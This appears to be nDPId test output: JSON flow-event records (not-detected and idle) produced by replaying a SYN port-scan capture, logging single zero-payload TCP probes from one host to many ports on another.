-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 